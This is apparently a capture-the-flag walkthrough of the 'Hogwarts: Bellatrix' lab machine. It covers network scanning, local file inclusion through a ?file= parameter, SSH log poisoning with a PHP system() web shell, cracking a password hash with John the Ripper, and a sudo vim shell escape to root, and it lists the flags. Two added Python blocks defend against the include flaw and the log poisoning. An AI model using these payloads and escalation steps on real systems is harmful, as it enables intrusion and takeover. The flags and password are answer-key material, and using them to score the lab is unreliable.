HOGWARTS: BELLATRIX (walkthrough)
This task is a bit different from the others: the machine is provided as a .ova file, which VMware Workstation can import. We will set up the machine using these steps:
- Import the .ova file in VMware Workstation Pro [Note: the Pro version makes it easy to set up the network settings using the Virtual Network Editor]
- Change the network settings after launching the machine:
> click on Edit
> Virtual Network Editor
> Change Settings (bottom right; grants permission to change the network settings)
> change VMnet0 to Bridged type and set the external connection to the host-only ethernet adapter (I am using VirtualBox to perform this challenge, so I add the VirtualBox host-only adapter)
> click Apply and OK
- Now, set up the VirtualBox machine's network, from where we perform the whole challenge:
> click on the machine's Settings
> go to the Network section
> enable the Adapter 1 and Adapter 2 boxes (one for access to the VMware machine, the other for internet connectivity)
> Adapter 1 settings: Attached to → Host-only Adapter; Name → VirtualBox Host-Only Ethernet Adapter
> Adapter 2 settings: Attached to → Bridged Adapter; Name → Intel Wi-Fi 6 (in my case; the name of your main internet adapter may be different)
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
Let’s begin the challenge from here
Phase 1 (on virtualbox machine)
ifconfig : this shows the attacking machine's IP (192.168.56.108 on eth0 in my case)
First, perform a netdiscover scan to get the target (VMware machine) IP address using sudo netdiscover -P -i eth0 -r 192.168.56.0/24
Check for open ports using the network scanner Nmap with the command
sudo nmap -A -sS -sV 192.168.56.106
Open ports are 22 (ssh) | 80 (http)
Phase 2
Open a browser and browse to the IP address (192.168.56.106 in my case)
Reconnoitre the whole website: check the source code and use inspect element
Information gathered:
“ikilledsiriusblackikilledsiriusblackikilledsiriusblackikilledsiriusblack.php” → found on the last line of the website
/* $file = $_GET['file'];
if(isset($file)){
include("$file");
} */
→ this is commented out in the source code
This shows we have a path /ikilledsiriusblack.php and a script which takes a file name as input
Searching and reading some other write-ups to understand the hints, it indicated a possible LOCAL FILE INCLUSION vulnerability
192.168.56.106/ikilledsiriusblack.php?file=/etc/passwd
This URL can be described as
/ikilledsiriusblack.php → the page
?file=/etc/passwd → the LFI vulnerability can be confirmed like this
Looking at each line carefully, I got two things
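Added example, not code from the challenge: the hardened form of the commented include("$file") guard, shown in Python so it can be run here. The web root and the page names are assumed values.

```python
import posixpath

# Added example, not code from the challenge: the hardened form of the
# commented include("$file") that made the LFI possible. The web root and the
# page names are assumed values for the example.
WEB_ROOT = "/var/www/html"
ALLOWED_PAGES = {"index.php", "about.php"}

def resolve_include(web_root, requested):
    """Map a ?file= value to a path that is safe to include, or None to refuse.

    Three checks, each of which blocks the /etc/passwd and /var/log/auth.log
    requests shown in the write-up: no absolute paths, the normalised path
    must stay under web_root (this defeats ../ traversal), and the result must
    be one of a fixed set of pages rather than anything the caller names.
    """
    if not requested or posixpath.isabs(requested):
        return None
    candidate = posixpath.normpath(posixpath.join(web_root, requested))
    if posixpath.commonpath([web_root, candidate]) != web_root:
        return None
    allowed = {posixpath.join(web_root, page) for page in ALLOWED_PAGES}
    return candidate if candidate in allowed else None

def classify_requests(requests):
    """Label each ?file= value as 'allowed' or 'refused'; handy for a quick audit."""
    return {r: ("allowed" if resolve_include(WEB_ROOT, r) else "refused") for r in requests}

if __name__ == "__main__":
    probes = ["about.php", "/etc/passwd", "../../../etc/passwd",
              "/var/log/auth.log", "about.php/../index.php"]
    for req, verdict in classify_requests(probes).items():
        print(f"{verdict:8} {req}")
```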
bellatrix:x:1000:1000:Bellatrix,,,:/home/bellatrix:/bin/bash
lestrange:x:1001:1001::/home/lestrange:/bin/rbash
The bellatrix user has /bin/bash, meaning everything is allowed, & the lestrange user has /bin/rbash, meaning it has a restricted shell and can't perform all terminal commands…
After learning more about the LOCAL FILE INCLUSION vulnerability, I got to know we can perform log poisoning using two methods:
RCE via the Apache access log & via the SSH log
command ?file=/var/log/apache2/access.log → RCE is not possible, as it is not allowed
command ?file=/var/log/auth.log → SSH log poisoning is successful
Now that we know SSH is possible through this vulnerability, and everything is dumped into a log file which is accessible, let's try to perform it…
ssh Bellatrix@192.168.56.106 (we don't know the password, and it is not needed)
Doing so, we notice a new entry in the log file. Remember the commented script in the page source… we have to add a PHP script, passed as the username in ssh, that executes whatever we pass to it.
This PHP script is '<?php system($_GET['m'])?>' (quotes included). I can describe it in detail as
a PHP code for executing any command we pass in the variable 'm'
> system() is a PHP function that allows the execution of shell commands.
> $_GET['m'] retrieves the value of the query parameter "m" from the URL
Further exploiting this vulnerability, we can open a reverse shell to our machine's terminal for full access
Enumerating each directory manually, I found some useful information
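Added example, not part of the write-up: how a defender spots the poisoned entry described above in /var/log/auth.log. It parses the username field of sshd messages and flags names that contain a PHP open tag or characters no real account name has. The log lines are constructed for the example; hostname, PIDs and ports are made up.

```python
import re

# Added example, not part of the write-up: detect SSH log-poisoning attempts
# in /var/log/auth.log via the username field of sshd entries. The log lines
# below are constructed for the example; hostname, PIDs and ports are made up.
SAMPLE_AUTH_LOG = """\
Apr 10 12:00:01 bellatrix sshd[1234]: Invalid user <?php system($_GET['m'])?> from 192.168.56.108 port 50212
Apr 10 12:00:01 bellatrix sshd[1234]: Failed password for invalid user <?php system($_GET['m'])?> from 192.168.56.108 port 50212 ssh2
Apr 10 12:00:09 bellatrix sshd[1240]: Failed password for invalid user Bellatrix from 192.168.56.108 port 50220 ssh2
Apr 10 12:01:30 bellatrix sshd[1251]: Accepted password for lestrange from 192.168.56.108 port 50231 ssh2
"""

# Username field of the common sshd auth messages; non-greedy so a username
# containing spaces (as a poisoned entry may) is captured up to " from ".
SSHD_USER_RE = re.compile(
    r"sshd\[\d+\]: (?:Invalid user|Failed \w+ for invalid user|Failed \w+ for|Accepted \w+ for) "
    r"(?P<user>.+?) from (?P<ip>\d{1,3}(?:\.\d{1,3}){3})"
)
# Characters a real Unix account name is limited to.
SAFE_USERNAME_RE = re.compile(r"^[A-Za-z0-9._-]+$")
PHP_TAG_RE = re.compile(r"<\?")

def find_poisoned_usernames(log_text):
    """Return one finding per sshd line whose username looks like injected code."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = SSHD_USER_RE.search(line)
        if not m:
            continue
        user = m.group("user")
        if PHP_TAG_RE.search(user):
            reason = "php open tag in username"
        elif not SAFE_USERNAME_RE.match(user):
            reason = "username contains characters outside [A-Za-z0-9._-]"
        else:
            continue
        findings.append({"line": lineno, "ip": m.group("ip"), "user": user, "reason": reason})
    return findings

if __name__ == "__main__":
    for f in find_poisoned_usernames(SAMPLE_AUTH_LOG):
        print(f"line {f['line']}: {f['reason']} ({f['ip']}): {f['user']!r}")
```

Because the poisoned entry lands in the log before any password is tried, this check also works on the "Invalid user" line alone, which is the one the write-up relies on.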
lestrange:$6$1eIjsdebFF9/rsXH$NajEfDYUP7p/sqHdyOIFwNnltiRPwIU0L14a8zyQIdRUlAomDNrnRjTPN5Y/WirDnwMn698kIA5CV8NLdyGiY0
a hash stored in the Swordofgryffindor directory & also a .secret.dic file containing a wordlist
So at this point I have a hash and a wordlist with user names; let's find the value of the hash using the tool JOHN THE RIPPER
password:ihateharrypotter
ssh to the other user, lestrange, with the password ihateharrypotter. But it is a restricted shell (we already know from /bin/rbash).
command sudo -l (to know what the user has permission to run)
ALL : ALL) NOPASSWD: /usr/bin/vim (means we can use vim to execute our commands)
Bypass it by launching a shell from vim
sudo vim -c ':!/bin/sh' (: means vim's command mode, ! means execute an external shell command)
Gained full shell access; enumerate the bellatrix directory and get the user flag
user: {69e0f71f25ece4351e4d73af430bec43}
But we need to get root, so moving further…
Enumerate the root directory, which shows a root.txt file containing
root{ead5a85a11ba466011fced308d460a76}
AND THAT'S THE END OF THE CHALLENGE
THANK YOU for reading till here!
Find me here: https://www.linkedin.com/in/mandeepkumarbanihall/